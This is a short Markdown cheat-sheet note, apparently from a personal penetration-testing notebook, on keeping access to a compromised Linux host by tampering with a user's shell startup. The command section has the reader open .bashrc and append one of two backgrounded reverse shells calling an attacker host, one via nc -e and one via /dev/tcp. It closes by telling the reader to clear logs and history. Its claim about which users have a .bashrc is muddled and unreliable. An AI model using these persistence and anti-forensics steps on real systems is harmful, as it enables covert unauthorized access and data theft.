31 lines
1.8 KiB
Markdown
31 lines
1.8 KiB
Markdown
|
|
## General
|
|
In Unix-like operating systems, the shell is the command-line interface that users can use to interact with the system. When a user logs in, their default shell is started and they are presented with a prompt where they can enter commands. Each user on the system has a default shell that is specified in the system's configuration, and the user can choose to use a different shell if they prefer.
|
|
|
|
An attacker who has gained access to a system can modify the shell configuration of a user in order to maintain persistence on the system. This can be done by changing the user's default shell to a shell that has been modified by the attacker in some way. For example, the attacker could modify the shell so that it automatically runs a script or command every time the user logs in, or so that it hides the presence of the attacker's files or processes on the system.
|
|
|
|
By modifying the shell configuration in this way, the attacker can maintain persistence on the system even after a reboot or after they have logged out. This can allow the attacker to continue to perform actions or gather sensitive data over an extended period of time without being detected.
|
|
|
|
|
|
## Commands
|
|
Find the Default Shell of users
|
|
```
|
|
cat etc/passwd ---> check for /bin/bash
|
|
```
|
|
If users has something else then bin/bash (ex: bin/sh) That mean the user will have a /.bashrc in the home folder of the user (bashrc allow you to modify the bash shell at its launch)
|
|
|
|
Add Reverse Shell
|
|
```
|
|
# Edit the code
|
|
nano .bashrc
|
|
|
|
# Add a bash reverse shell at the end of the code
|
|
nc -e /bin/bash Attacker_IP PORT 2>/dev/null &
|
|
or
|
|
bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &
|
|
```
|
|
- & Put the command in background
|
|
|
|
|
|
|
|
===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])=== |